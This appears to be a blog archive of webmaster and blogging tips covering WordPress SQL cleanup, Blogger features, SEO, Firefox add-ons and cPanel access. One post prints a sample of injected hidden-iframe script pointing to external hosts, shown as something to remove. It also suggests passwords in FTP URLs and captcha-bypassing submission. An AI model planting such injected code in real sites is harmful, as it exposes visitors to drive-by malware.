Add Your Picture to Blogger Comments Profile Photo

Today I come to know another little but pretty useful Blogger Feature. Although many of Bloggers know this but it is new for me. Previously, Whenever some one wrote a comment on some Blogger Blog, you could only see a Blogger ICON with your comment you made on blogspot blog. BUT now you can add your picture or some brand logo with your blogger comments.

The Feature is made public i.e. any one can put his/her picture with blogger comment he/she writes. Its easy to Upload your own picture to show with blogger comment. Write Your Comment, click on Preview (as shown in picture below)
 



After Clicking on Preview, Click on Add Profile picture now just browse and Upload Your picture. Now, that picture will be embedded whenever you post a comment on some blogspot blog. This Picture also will be added to your Blogger Account Picture. You can enable or disable your Blogger Comment Profile Picture from Dashboard>Settings>Comments

Delete All Pending Comments -WordPress,blogger

Delete All Pending Comments from WordPress Blog       
WordPress is most used Blogging Platform and of the function of WordPress blogs is Anyone can post Comments to an Article posted at Some WordPress Blog. A professional blogger knows about the Importance of Reader’s Comments posted on blog. When some post any comment or his/her opnion on a wordpress blog then it can be of three categories.
  1. Approved Comments: These type of comments and opinions are displayed on your blog below related post AFTER your approval.
  2. Pending Comments: Pending Comments need to be moderated by owner of blog before approval for being displayed on Blog.
  3. Spam Comments: WordPress detects some comments made by robots or software which do not have any relation with your Blog. These comments are only made to promote products. WordPress treat these Comments as SPAM.
Delete All Pending Comments
If your blog is famous or having healthy traffic then its obvious your blog will receive many SPAM comments. Its easy to Delete All Spam Comments from your wordpress blog by navigating Login -> Dashboard -> Comments -> Spam and Clicking on “Delete All SPAM” button. BUT the problem comes when thousands of comments pass the Spam filter and treated as Pending Comment and need you moderation for approval. Its really difficult and time consuming to delete all Pending Comments of Your WordPress Blog because if your blog is having about 1000 pending comments, Then you could only delete 20 comments per batch. So, Here i have found a way to Mass Delete All Pending Comments from Your WordPress Blog. In this way you could remove all Pending Comments from WordPress.
Step#1
Login in Your Hosting Control Panel and Click on myPhpadmin
Control Panel
Step#2
After Clicking on myPhpadmin, you will see a screen like below shown picture.
My PHP Admin
Step#3
Select your Blog’s mySQL database Account, (You will see a list of tables within that database)
Now Click on SQL (it can be located at next tab of structure). After Clicking on SQL, you will see a related image as shown below.
SQL
Copy-past below given SQL command and click on Go


DELETE FROM wp_comments WHERE comment_approved = '0'
Now you will get a message saying something like “853 rows affected”.
You have successfully Removed All Pending Comments of your WordPress Blog. Now login in your wordpress blog and you will see that all pending comments have been removed.

SEO For Images – Get TOP Ranks in Google Images

SEO For Images – Get TOP Ranks in Google Images
Today, There are thousands of blogs having a healthy percentage of their blog traffic from Search Engines such as Google, Yahoo, BING etc. Normally, Traffic is gained against Posts but if we optimize images used in a Post, we can have More traffic from Google images by having a TOP Rank in Google Images. All You have to do is to Optimize Images at Best Level to Have a Higher Position in Google Images for related keywords.

Google ImagesNormally, we forget to add many tags while showing a picture in our posts. All you have to do is to place proper tags while displaying images because search engines read these tags and consider this important factor of Search Engine Optimization for Images.

Images Names:

Images Names are one of the most important thing you need to do for Optimizing Images for Google Images and other Image Search Engines. Normally when you capture a picture using your mobile or Digital camera, the picture is stored in memory with an un-related name from actual picture such as DSC1331, DSC1332, DSC1333 etc these names are given automatically by Camera Programes and these names do not tell the information about the picture unless you view that picture. Google detects images for “Google Images” by picking pictures reading names of Images.
So, You need to pick a right name for your Picture used in Blog/website. such as obama-having-tea.jpg rather than DSC1331.jpg
Proper Tags:
Adding Proper Image tags while Placing Images will help you to see your upload images and Pictures in Google image Search Engine. Place Proper Tags also helps Image Crawlers to Index your Images and Pictures in Search Engines easily and Regularly. Below are Important Image Tags
  • alt=”Alternative Text”
  • title=”Image Title”
Images Related to Text:
Relevancy between text and Images is another important factor for SEO for Images. Google easily index your Post or text base article in Search BUT consider several factors to be satisfied for Google Images. Images Used in a Post or Article should be related to that Article. There are some smart bloggers who add celebrity pictures to their Highly ranked Tech blogs but this do not help them to get top ranks for celebrity kewyords as Tech blogs are different from Celebrity pictures.

Use Google Adsense for Image Optimization:
Yes! you can use Google Adsense for Image Optimization. All you need to do is to place a Google Adsense Ad Next to or Near an Image and See What kind of Ads Google Adsense display. You may be see related or un-related ads to your Post BUT this will help you to know that What Google Adsense Bots are considering about your Posted Image File.

Remove Duplicate Posts from WordPress Quickly

Remove Duplicate Posts from WordPress Quickly-2 method

Method-1:
      Is your WordPress Blog Having Duplicate Contents ? Okay, Dont worry, Actually duplicate contents has been a major issue with auto blogs and RSS feed catchers. Duplicate Contents also happens if you are importing your blogger blog again and again or if you are importing wordpress export file again and again. There are several wordpress plugins to delete duplicate posts from wordpress blog database but some of those plugins do not work and some of them are not free. Here is a free way to remove duplicate posts from wordpress easily. Just follow below given steps to Delete wordpress posts that are posted twice, thrice or more
 
Step#1
Login in Your Hosting Control Panel and Click on myPhpadmin

Control Panel

Step#2
After Clicking on myPhpadmin, you will see a screen like below shown picture.

My PHP Admin
 
Step#3
Select your Blog’s mySQL database Account, (You will see a list of tables within that database)
Now Click on SQL (it can be located at next tab of structure). After Clicking on SQL, you will see a related image as shown below.
SQL

Copy-past below given SQL command and click on Go


DELETE bad_rows.*
from wp_posts as bad_rows
inner join (
select post_title, MIN(id) as min_id
from wp_posts
group by post_title
having count(*) > 1
) as good_rows on good_rows.post_title = bad_rows.post_title
and good_rows.min_id <> bad_rows.id
Now Just wait for about 2 minutes and All your Duplicate Posts will be removed magically.

NOTE:
     You need to log in to your mysql database (usually PHPMyAdmin) and then run that script there. I just used it on a site of mine where a script had went totally overboard and added about 93.000 duplicate posts!

Query:
I ran this script, but my duplicates are still there?
       When I got into mysql database, there are not duplicate entries, but the front page shows duplicates down at the bottom, for just some of the posts, but the posts don't seem to have a core idenitfying characteristic, ie. symbols in post title, flash media in post, etc.
Ans:
       (also note, for WP 2.5 users, you need to add:
return 0; after if ($post_name_check || in_array($post_name, $wp_rewrite->feeds) ) { on line 1284 of wp-includes/post.php to get the duplicate posts to stop.

Method-2:
Description:
       Get rid of duplicate blogposts on your blog! How embarrassing, eh? This handy plugin can run in the background and automatically delete duplicate posts as they occur!
Or you can use it manually if you wish!
Installation:  
  1. Download the .zip file
  2. Extract the zip-file, containing the folder "delete-duplicate-posts"
  3. Upload to your wp-content/plugins/ folder on your blog
  4. Log in to your blog, go to the plugins page and look for "Delete Duplicate Posts" and activate the plugin
  5. You can now access the plugin in your "Tool" menu under "Delete Duplicate Posts"
Faq:    

What happens to my duplicate posts?

All of them will be completely erased from the database. There is no recovery option. Remember to back up your database first in case a mistake happens!

Bloom Puzzle Games Online

Puzzle Games Online, Puzzle, online puzzle games, Games for Girls, Games Online, Play Puzzle Games Online, Games Online Play, games for kids, games for girls, online games, games online, play games, play online games, play free online games, puzzle games, puzzle, puzzle games free online, sudoku, sudoku online

Make Your Website to Load Faster(blogger)

How to Make Your Website to Load Faster

       When a website loads slower, it irritates the website users BUT here is a way for webmasters to make their website to load faster or even reduce their website’s bandwidth. Page Speed, is a firefox add-on which is used to evaluate the performance of web pages. Not only evaluation but Page speed gives you suggestions to improve the speed of your web pages. Following are the features provided in Page speed.
  • Make Your Website to Load faster than before
  • Reduce Your Website’s Bandwidth
  • Keep Users Engaged With Your website.

Actually, this plugin performs various actions with the configuration of server and with front-end code. Page speed also performs various set of best practices known to enhance web page performance. When a Webmaster run Page speed on their Website pages, he gets set of scores for all pages and suggestions on how to improve the performance of a web page.

Firefox Plugins for Bloggers(websites)

25 Most Wanted Firefox Plugins for Bloggers

        Firefox is the first love of more than 90% bloggers but not just for some common reasons like it’s fast, it looks cool, it’s error free and bla bla bla… etc, but Firefox is the much convenient browser ever and at the mean time it has got some decent blogging solutions for bloggers, in the shape of add-ons or plugins. Mozialla, the developer company has got some very useful and productive Firefox plugins in it’s store that adds more sense to blogging. While compiling these blogging plugins to my list, I was wondering just one thing, “shit, I wish I could have came across these plugins earlier!”. And I sincerely wish not to here these lines from any other blogger, so here is my list of top 30 Firefox plugins for blogging that bloggers should not miss.




1. easyComment : Most of us know that commenting on other blogs increase our exposure, influences PR and gets incoming traffic. easyComment makes commenting on other blogs easier by automatically filling the Name, Email and URL field. You can set different profiles and different values (if you have got more than one blog or identity) and click on the easyComment link from status bar to save your time and post comments faster.

2. SEO Link Analysis : This Firefox plugin enriches your blogging experience by customizing Google Webmaster and Yahoo! Site Explorer. It customizes the provided link data in Google Webmasters Tools & Yahoo! Site Explorer interface by displaying the Google PageRank of the linked web pages, anchor text user, nofollow links etc. This plugin is in it’s experimental mode, but pretty good to understand blog SEO factors.

3. FeedBurner Subscribers : FeedBurber Subscribers monitors your blog readers and displays the report to track your RSS activities. It monitors the number of RSS subscribers with the number of hits to your RSS feed. It’s pretty useful since you don’t need to login to your FeedBurner account and can monitor everything just from your browser.

4. Screen grab to WordPress : Most of the times bloggers need screenshots of various screen activities, web pages or similar stuffs to attach in the posts. Commonly we capture the image using different tools or by using keyboard, customize it and then upload via WordPress image upload feature. Screen grab to WordPress Firefox plugin eliminates all those steps by simply allowing users to save screenshots and uploading them to WordPress blogs directly.

5. OnlyWire : This Firefox add-on submits content to over 30 social networking sites with just one mouse click. Instead of submitting your contents manually, use this plugin to submit your posts to top 30 social networking sites at once. After installing OnlyWire add-on for Firefox, you will enjoy a seamless experience while submitting contents as it bypasses captcha verification methods during submission in sites like Digg, Reddit and StumbleUpon etc.

6. MySpace Blog Editor : This is going to be more useful for you if you are blogging on MySpace. The MySpace blog editor plugin allows MySpace bloggers to post directly to their blogs from within Firefox interface. The posts you publish from Firefox automatically gets published on your blog while you can also save notes (drafts), use drag and drop features to copy images, text from web pages, format text and images and much more.

7. Share Buttons : This Firefox add-on makes your job easier by adding social media buttons like of Facebook, Digg, Twitter, Email, Reditt, StumbeUpon etc to your blog posts. The sharing buttons appear only when you have published the posts and the sharing button icons look really bold and sexy. It supports various blogging platforms such as Blogger, WordPress.com, self hosted WordPress blogs while the plugin author promises to bring the support for other platforms soon.

8. User Agent Switcher : Your blog readers might visit your blog using different platforms such as web based browser, mobile phone, iPhone etc while the prime reader of your blog known as search robots use their own developed platform. You need to be sure that your blog is being loaded perfectly to all of them. Using User Agent Switcher plugin, you can adds menu and a toolbar button from where you can switch the user agents of the browser.

9. Save Complete : Save Complete is an advanced solution to save web pages flawlessly. Since most sites are using CSS stylesheet files to format web pages, Firefox’s built-in web page saving feature becomes less effective, as it doesn’t support stylesheets. This extension eliminates this drawback and saves the complete web page, including all images, stylesheets, flash, javascript files easily.

10. Feedly : Feedly creates a magazine style interface to display subscribed RSS feeds. You can import your favorite RSS feeds from Google Reader, Bloglines, Netvibes, your bookmarks and organize them into tabs or categories. You can configure the appearance by selecting either title only, title and summary, image grid, video grid or entire content while you can filter the most relevant/popular contents, share articles on social media sites, sync with Google Reader or across multiple computers, use keyboard shortcuts and rich integration with Mozilla Ubiquity and more.
11. Clipmarks : Clipmarks plugin allows bloggers to link to specific files instead of linking to entire web pages. Using Clipmarks, you can share selected files or specific part of a web page on Twitter or Facebook, save them on Clipmarks.com, post them directly to your blog, email them to friends, print them easily.

12. Google Global : Google Global add-on helps bloggers by categorizing the organic and paid Google search results. It displays the paid and organic results as they appear in different cities, regions, IP address, ZIP code, different language search pages etc. It also opens all results from countries, cities and regions in multiple tabs for easy comparison while you can filter your searches by using custom advanced saved searches.

13. Better Google Analytics : Better Google Analytics is a must have Firefox plugin for bloggers as it adds more functionality to your Analytics account by integrating several GreaseMonkey scripts. Using this plugin you can enjoy auto-login to your Analytics account, add search box to keyword reports, export Analytics reports as CSV to Google Docs, full screen reports on Analytics homepage, perform Google Insights searches on keywords in Google Analytics reports and more.

14. KGen : KGen is a smart plugin that pulls out all words of a page and finds the major keywords based on their weight in the page, making it easier for you to optimize your pages, know your competitor secrets etc. You can also choose keywords and tag them while submitting your contents to social networks or fill meta-keywords of your web pages. This is also helpful in generating tag cloud for your blog.

15. Blog This in Windows Live Writer : It’s an extension of Windows Live Writer tool that helps users in opening a new Windows Live Writer blog post pre-populated with the contents and title of any web page to blog either the whole page (not recommended at all) or just selected snippets. This really helps to blog something quickly, that you find interesting on the web. Once you have written the post, you can publish them to Windows Live, WordPress, Blogger, Live Journal, TypePad, and many more with just one click.

16. MeasureIt : It’s one of the plugins that will come in your help every other moment. It allows users to draw a ruler across any web page to check the width, height, or alignment of page elements in pixels. It’s very useful to measure the width, length of a table, iframe, flash game or something like that. It creates horizontal and vertical center guidelines and allows to measure using different units and multiple measurements at once.

17. Zemanta : Zemanta expands the author’s blog dashboard with relevant images, links, articles, tags to encourages bloggers to refer to other similar contents just to improve the quality of the article. It collects news from Wikipedia, IMDB, CrunchBase, MusicBrainz, videos from YouTube, 5min, images from Getty, Flickr, Wikipedia,news from BBC and CNN and over 10,000 blogs while it supports Wodpress, Blogger, TypePad, Movable Type, Ning, Drupal, LiveJournal, Tumblr and email platforms such as Gmail and Yahoo! mail.

18. NoDoFollow : As the name says, this plugin helps you in recognizing the NoFollow links on a web page. This is very essential to find the web pages that do not give credit to the posted links, so that you can think of any other DoFollow we pages. NoFollow links ads no value to the pointed URL and hence this Firefox plugin helps you to create more DoFollow link juice by recognizing them.

19. IE View : Bloggers are generally concerned about the way their blog loads on different web browsers. Since Internet Explorer is the dumbest browser ever and the bitter truth is that even today IE is the most used browser, you might want to see if Internet Explorer displays your page correctly. Lets say you have opened a web page in Fireox, using IE View plugin you can load that page in IE with a single right-click, or mark certain sites to always load in IE. Useful for incompatible pages, or cross-browser testing.

20. OneClick Installer for WordPress : OneClick is a dedicated extension for WordPress blogs that allows users to install wordpress themes or plugins from the context menu of Firefox browser. However, you need to install a plugin (OneClick plugin) in your WordPress blog first to support this Firefox add-on. This smart add-on automatically detects theme and plugin files and adds a upload option in the right click context menu.

21. Screen Grab with Online Upload : Screen Grab Online Upload add-on not only allows users to save screenshots of web pages but also uploads it to a free image hosting website so that you can share the link of your captured screenshot instantly. You can capture what you can see in the window, the entire page, just a selection or any particular frame and once you do it, the screenshot gets uploaded to Imagebam.com website.

22. ScribeFire Blog Editor : ScribeFire is a Firefox extension that integrates a powerful blog editor with the most popular web browser from where you can write new posts, make edits and publish them easily on your blog. It allows bloggers to drag and drop formatted text, take instant notes, upload images, and post them to various blogging platforms including Blogger, WordPress.com and self hosted WordPress blogs.

23. Firebug : Firebug is a complete web application tool that gets integrated with Firefox to allow users to easily edit, debug, and monitor CSS, HTML, and JavaScript codes live in web pages. It features some very advanced features and allows users to inspect and edit HTML, tweak CSS to perfection, visualize CSS metrics, monitor network activity, debug and profile JavaScript, find errors quickly, explore the DOM, execute JavaScript on the fly, logging for JavaScript and more.

24. ScrapBook : ScrapBook extension for Firefox allows users to save web pages fast and easily with proper lightness, accuracy and multi-language support. It can not only save web pages, save web page snippets, save websites, organize and manage the saved pages collections as the way you manage bookmarks, perform full text search and filter search collections quickly, edit collected web pages, text/HTML editing feature like Opera’s Notes and more.

25. GreaseMonkey : GreaseMonkey is one of the most popular Fire extensions ever that allows users not only to customize the look of a web page but also the default functions. There are hundreds of free scripts available to customize and make the web pages the way you want. Bloggers will find this helpful in customizing a site with the way they want so that they can get the most out of things in a short span of time.

26. SearchStatus : Google PR, Alexa rank, Compete ranking are few of the important aspects for any blogger. This plugin displays all important informations that a blogger needs to maintain his/her best at blogging. SearchStatus Firefox add-on displays Google pagerank, Alexa rank, Compete rank, SEOmoz, Linkscape, mozRank along with other blogging metrics such as fast keyword density analyser, keyword/nofollow highlighting, backward/related links, Alexa info and other SEO tools.

Register Domains or Buy Hosting with Unverified Paypal Account(website)

Register Domains or Buy Hosting with Unverified Paypal Account
    
      
        There are several countries where there is no affiliation of PayPal with Banks (like in Pakistan) so, People can not verify their PayPal accounts. As there are a few websites which accepts unverified paypal accounts, people with unverified PayPal just ignore paypal services. Its true that Unverified paypal has several limitations such as usage of $500 per year or no withdrawal of balance etc. But here is a good news for people having Unverified PayPal Accounts.

      Now You can Purchase Website Hosting Accounts with Unverified PayPal, you can also register Domain names using Your Unverified paypal account. You can buy domains or hosting from the same website using your Unverified PayPal Account. visit: www.Name.com

          You can also purchase a premium Rapidshare.com account with unverified paypal account. You can also purchase or shop online with unverified paypal account at eBay.com by asking seller to send you invoice in your (unverified) paypal rather than paying directly through eBay (direct payment through eBay requires verified paypal account). So, there are many other tricks to get benefits from your Unverified PayPal account, All you have to have is a Tricky Mind and little research.

Watermark Pictures and Wallpapers for free(website)

Watermark Pictures and Wallpapers for free
 
      All Bloggers and Webmasters want to watermark pictures with logos to protect their owned and uploaded pictures. Watermarking is a processes of Placing Website logos on Pictures or Text Links to show your ownership of pictures. There are many software to place logos on pictures or to watermark pictures with text or logos but here is best application to watermark pictures.

     How to Watermark Pictures and Wallpapers is a most asked question of Webmasters and bloggers becasue its neccessary to place logo or website link on pictures and wallpapers to stop unauthorized distribution of your owned pictures and wallpapers.
 
Watermark Pictures and Wallpapers For Free 
 
      WinWatermark is a useful software to Watermark Pictures and Wallpapers. Its really easy to place logos and text on wallpapers and pictures with Winwatermark software. Not Only Watermarking Pictures, But with Winwatermark, You can add frames to pictures, rotate pictures, resize pictures, adjust pictures according to need, convert your pictures into other formats.

          Another Benefit of Watermarking Pictures with Winwatermark is that You can watermark batch of pictures i.e. you can watermark all pictures in a folder. So, it is also time saving and easy to use.

          Winwatermark is a utility application to place logos on pictures or wallpapers, You can also place text on pictures and wallpapers to show your ownership. Its also a simple photo editor to add frames, resize pictures, convert picture formats etc. Click here to download Personal edition of Winwatermark to Watermark Pictures and Wallpapers.

How to Access - Hosting Account cPanel Quickly?(Websites)

2 Method to Access your Hosting Account cPanel Quickly?

Webmasters access their Hosting Cpanel (Control Panel) daily for managing and uploading files and contents of their websites/blogs. Hosting Provides gives you a particular login address with port number and your domain which looks like http://www.domainname.com:2085 where “domainname” is the Name of your Domain and 2085 is the number of Port.


cPanel
User name
Your User name
Password
************
login



But there are two more methods to login in your Hosting Account Control Panel easily and quickly.

Method 1
v       You can enter in to your hosting account panel by navigating to www.domainname.com/cpanel where “domainname” is the name of your website domain. A Window box will appear asking you the Login Details. Just Enter username and password and access your account.
Method 2
v       This method is little difficult but yet an other method. You need to navigate to ftp://username:password@yourdomain.com
User name = your user name
Password = your password
Your domain = your domain name

       Don’t forget to type ftp instead of http and also use colon (:) and @ sign. Method 2 will take directly to your public_html folder which is your parent root.

"Reported Attack Site" -“Quick Solution of Attack”(Website,Blogger)


Google introduced Safe browsing times ago which is an extension of Firefox and keep the Firfox browser users safe from websites which install some viruses, malware or spywares in computers.

What is “Reported Attack Site”

Reported Attack Site is a warning page which is displayed instead of a website which is indicated as a website which can harm your computer by installing viruses or malwares. This happens because of below reasons.
o Your Website or any page of your website is hosting phishing pages (harmful javascripts, iframes etc)
o Third Party Scripts, placed in your websites, are not secure
o Your FTP Password or File Manager has been compromised.
o The Computer from where you upload data in your website, is infected by malware, trojan or other viruses.
o You have set insecure folder permissions
What Happens when your website is “Reported Attack Site”
When your website is indicated as Reported attack site then Firefox users get a warning page when they access or open your website mainpage or any other page within that website. Users see a page as shown in below picture, instead of your website’s page.


Reported Attack Site
      This web site at www.-------.com has been reported as an attack site & has been blocked based on your security  preferences.
       Attack  sites try ti install programs that steal private information ,use your
Computer to attack others,or damage your system.
        Some attack sites intentionally distribute harmful software,but many are
Compromised without the knowledge or permission of their owners.

Get me out of here?                            Why was this site bloked?


The worst part of this security reason is your website is also treated as a website which can harm computer in Google Search for what, you receive ZERO traffic from Google Search as Google show a security warning when any one come to your website from Google Search. Google shows a warning page instead of your website for those users who come to your website using Google Search. This Warning page look like

Warning – visiting this web site may harm your computer!

So, You not loss users but also bear financial losses from (ads,sales etc).
What to Do When Your Website isReported Attack Site”
Thats the main question HOW TO GET RID OF When Your website is REPORTED AS ATTACK SITE by Google Safebrowsing. Ok, Just follow these steps to fix the problem.
  1. Create an Account with Google Webmasters Tools (if you not have already)
  2. Add Your Website and Verify Your Website by placing Meta Tags or by Uploading HTML File in your website
  3. Once Your website is verified in Google Webmasters Tools, you will see a Warning Page within Your Domain Dashboard in Google Webmasters Tools.
  4. Click on That Warning Note and you will see list of infected pages due to what Google is treating your website as harmful website.
  5. Check those Pages for harmful javascripts or iframes and remove those Javascripts or Iframes from those pages. Expected harmful javascripts and iframes can look like this
<script>document.write(‘<iframe src=”http://erapost.net/?click=13474390″ width=100 height=100 style=”position:absolute;top:-10000;left:-10000;”></iframe>’);</script><iframe src=”http://msnupdateserver.info/?click=1D00DD” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
<script> var fr= unescape(‘%3c%69%66%72%61%6d%6 . . .
  1. Now Just Request for a Review of your website to Google, from the same warning page where you got the list of infected pages in Google Webmasters Tools Dashboard of your website.
  2. Check the Box and an Ask for a Review.
  3. The Review Process takes 5-16 hours, so be patient.
Helpful Websites to find out malware, worms, trojans or infected javascripts and iframes in your website or blog.
o Open http://www.google.com/safebrowsing/diagnostic?site=YOURWEBSITE this will help to find-out how many domains are infecting your websites or infected by your websites.
o http://wam.dasient.com/wam/
This worked for me, Hope this Article/post will be helpful for you also.

 “Quick Solution of "Reported Attack Site" Attack”

Make Free Websites - Unlimited Space & Bandwidth

Make Free Websites - Unlimited Space & Bandwidth

Everyone, now a days, is making websites to earn online money by providing their services. Some of them buy their own web hosting and some use free hosting servers. Its hard to find any tool to create free website online BUT Microsoft Office Live Small Business allows users to create free website. You do not need to have a credit card to sign up or pay them any fee, you don’t event need to purchase a domain name.

If were really looking for an easy way to make free websites online so this post will surely make your day because Now you can create free websites with MS Office Live Small Business without any credit card or paypal account. The most useful benefit is that all your files will be hosted on Microsoft servers which are believed to be faster than other hosting servers. You can also share and store documents using Microsoft’s servers.
Build Your Website + Choose a Domain + Add Email + Store & share docs 

All the tools and sources will be given to you to design your website with an instruction guide which will help you step-by-step. You will also be able to use Microsoft Site Designer to design your website. You do not need to have any professional or designing skills to create a professional looking website because you get Microsoft Site Designer to help you all the time. You can select a template for your website from a large database of templates. You can customize logo, color combination etc and also can integrate Paypal in that freely created website.
You will get a free website address like www.infotech.web.officelive.com but you can use your custom domain also like www.infotech.com but for custom domain, you will have to pay from your pocket.
    
Features of Microsoft Office Live Small Business
v     Completely Free Website Hosting
v     Unlimited Space and Unlimited Bandwidth (when Microsoft said, simply TRUST)
v     Free Email Accounts
v     Free Templates
v     Easy Customization of Logos and Color Combination
v     Paypal Integration
v     Free Online Support
v     Store or Share any document Online at Microsoft’s Servers
v     Site Traffic Statistics and Domain redirection

           The service is currently available only in U.S.A , U.K. , India, Japan, Mexico so if you are in any of these locations but you can create a free website using U.S.A. zip code if you are out of these locations, Just to create you free website with unlimited hosting and bandwidth by Microsoft. If you are not from these locations or don’t want to use U.S.A location, just wait for some time, Microsoft will surely launch this free service in your country also.


Limitations of my Blogger account?(Website)


Limitations of my Blogger account:

Blogger has imposed the following limitations on content storage and bandwidth, per user account.We try to give you a lot of room to play here on Blogger, so you'll see that a lot of the important "limits" here aren't really very limiting. But just in case you were wondering, here is some information about about what a single Blogger account will hold.
  • Number of blogs = Unlimited
  • Size of pages = Individual pages (the main page of a blog or archive pages) are limited to 1 MB
  • Number of Posts: There is no limit on the number of posts you can have on one blog. They will all be saved on your account (unless you manually delete them) regardless of whether you are publishing archives or not.
  • Size of Posts: Individual posts do not have a specific size limit, but very large posts may run you up against the page size limit. (See the next item.)
  • Number of labels = 5,000 unique labels per blog, 20 unique labels per post
  • Number of pictures (hyperlinked from user's Picasa Web Album) = Up to 1 GB of free storage
  • Number of Comments: A post can have any number of comments. As with archived posts, if you choose to hide comments on your blog, all pre-existing comments will remain saved on your account.
  • Number of Labels: Up to 2000 unique labels per blog and 20 per post.
  • Size of pictures = If posted via Blogger Mobile, limited 250 KB per picture; posted pictures are scaled to 800px[citation needed]
  • Team members (those that can write to a blog) = 100
  • Blog Description: Limited to 500 characters, with no HTML. Adding additional characters or HTML may cause it to revert to a previous setting.
  • "About Me" Profile Information: Maximum of 1,200 characters.
  • Profile Interests and Favorites: Maximum of 2,000 characters in each field.




Blogger Redesign(Web Site)-Service

         As part of the Blogger redesign in 2006, all blogs associated with a user's Google Account were migrated to Google servers. Blogger claims that the service is now more reliable because of the quality of the servers.
         Along with the migration to Google servers several new features were introduced, including label organization, a drag-and-drop template editing interface, reading permissions (to create private blogs) and new Web feed options. Furthermore, blogs are updated dynamically, as opposed to rewriting HTML files.
         In a version of the service called Blogger in Draft,[ new features are tested before being released to all users. New features are discussed in the service's official blog.
         In September 2009, Google introduced new features into Blogger as part of its tenth anniversary celebration. The features included a new interface for post editing, improved image handling, Raw HTML Conversion and other Google Docs-based implementations, including:
  • Adding location to posts via geo tagging.
  • Post time-stamping at publication, not at original creation.
  • Vertical re-sizing of the post editor. The size is saved in a per-user, per-blog preference.
  • Link editing in Compose mode.
  • Full Safari 3 support and fidelity on both Windows and Ma OS.
  • New Preview dialog that shows posts in a width and font size approximating what is seen in the published view.
  • Placeholder image for tags so that embeds are movable in Compose mode.
  • New toolbar with Google aesthetics, faster loading time, and "undo" and "redo" buttons. Also added was the full justification button, a strike-through button, and an expanded color palette.
In 2010, Blogger introduced new templates and redesigned its website. The new post editor was criticized for being less reliable than its predecessor.

Google Error 404 Blogger Custom Domains

Blogger is ranked in Top 10 websites of the world by Alexa and the reason for such ranking is user-friendly interface and easy to use features. We can easily can create a free blog with blogger within few clicks. There are thousands of blogger templates and several blogger tips which help us to make a blog look beautiful. We can personalize our blog by removing .blogspot.com from free given blog address. We can assign a paid domain to our blog which is called blogger custom domain. Blogger allows you to add a custom domain for free, however wordpress charges a fee for assigning a custom domain. You should blogger and wordpress comparison
chart. While assigning custom domain to blogspot blogs, several bloggers stuck at an error which looks like:



This is called, Google Error 404 Page. It happens due to unknown reason however you can fix this by following below given instructions:

Instructions

  1. Sign in Your Blogger Account
  2. Go to Settings > Publishing and click on Switch to: blogspot.com
  3. After going back to .blogspot.com URL, assign your custom domain again.
  4. Thats it ! now you will not have this error.
If above tip does not work for you, let me know via comments.

Create a Free Blog with Blogger?

There are several websites giving you a free platform to start your blog and share your thoughts with the world. Blogger.com and WordPress.com are world’s most commonly used blog services. There are many limitations creating a free blog at WordPress.com because you can not install plug-ins, you can not modify or edit WordPress template according to your requirement, You can not monetize your wordpress.com free hosted blog. But in Blogger, you can install widgets, you can edit templates according to your requirements and you can earn some money from your Blogger.com free blog as well. So I will suggest you to go with Blogger. Creating a Blog at Blogger.com is as easy as 123. Just follow these simple steps to create a free Blog using Blogger.com Service.
.
  • You Will get a form, Just Fill that form and after filling click on Continue
  • Now, Give Your Blog Title and a Blog Address (check availability) and Click on Continue (see below shown picture for assistance)
  • Just Complete Step1, Step2, Step 3 and Step4 as shown in above picture.
  • Now, Its Time to Select a Design for your Blog. Select any Design by clicking on that design and after selecting any design click on Continue
  • Congratulation!!! You Just Have Created Your Blog. Now Just Click on Start Blogging and you are on you way.
  • That’s it!!!
If you face any difficulty creating a free blog using Blogger.com then feel free to discuss with us using Below comments form.

5 Things to Know When Starting a Blog

A blog is an abbreviated word for weblog. It is a web-based journal in which people can publish their thoughts and opinions on the Internet. Blogging is an interesting and rewarding career path nowadays. You can use free or paid host serving to begin a blog. You just need to have a flair for being able to read and write well. To start a blog is easy but to maintain a blog is the most difficult part. Follow the tips below to make every effort you put into your blog worthwhile. Determine the answers to the 5 questions below:

What is your use?

Decide if you want to focus on company branding, or perhaps differentiating your services by writing about your specific expertise or perhaps carrying out market research. Read other blogs and sites to gain some useful knowledge and to avoid future problems.

Who would you want to read it?

The best types of business blogs are specific in nature. Determine who you are writing for, then you should be able to write things that are going to interest them. Write about topics that interest you. They might be unpopular in the beginning but if you know what you are writing you will grab the attention of the reader and provide endless fresh ideas too. Competition in blogging is tough so be prepared that if your topic does not intrigue the reader, he will move away from it. You can keep your blog open to any Internet visitor or you can just keep it open for your friends and family to be able to read it. Most blog sites offer the service of password-protect so that your published posts are open to only those who you approve of.

Where to run your blog?

Decide whether you want to have run your blog on your own website or run it from a separate domain. If it complements and is related to what you have on your website then integrate it with your website. On the other hand, if you want to take a different stance in your blog which does not coincide with your main website, then you can use a different domain.

How much time will you spend on it?

Blogging requires time. You will keep on writing posts but even maintain the quality of what you produce as well. Plan how much time you are willing to dedicate to your blog and how much you can easily afford to give.

What do you want your blog to achieve?

What is your target? What do you want the return on investment to be? Measure the results and decide on the criteria and target you wish to achieve.